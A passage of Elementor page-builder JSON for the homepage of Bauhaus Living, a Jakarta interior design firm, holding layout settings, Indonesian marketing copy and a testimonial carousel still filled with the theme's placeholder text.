lideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"Apa kata mereka tentang Bauhaus?\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Prijonno Nugroho\",\"job\":\"Action Coach Jakarta\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/56947243_2426566684042502_6812443397089918976_n.jpg\",\"id\":4923,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"4b2f506\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept 